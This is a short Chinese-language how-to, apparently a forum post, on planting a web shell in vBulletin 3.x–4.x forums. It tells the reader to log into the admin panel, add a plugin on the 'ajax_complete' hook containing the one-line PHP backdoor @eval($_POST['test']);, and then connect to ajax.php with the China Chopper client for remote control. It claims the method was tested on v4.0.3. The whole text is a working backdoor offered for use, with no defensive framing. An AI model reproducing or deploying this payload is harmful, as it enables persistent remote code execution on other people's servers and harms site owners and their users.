以管理员身份登录后台http://x.x.x.x/bbs/admincp/,在“插件与产品”->“新添加插件”:

钩子位置选“ajax_complete”,标题随便输入,代码加入以下:

{
@eval($_POST['test']);
}

保存后得到一句话***,可以用caidao连接访问http://x.x.x.x/bbs/ajax.php,获得一个webshell….

在vBulletin? v4.0.3测试通过,理论上此方法支持3.x-4.x版本的vbb。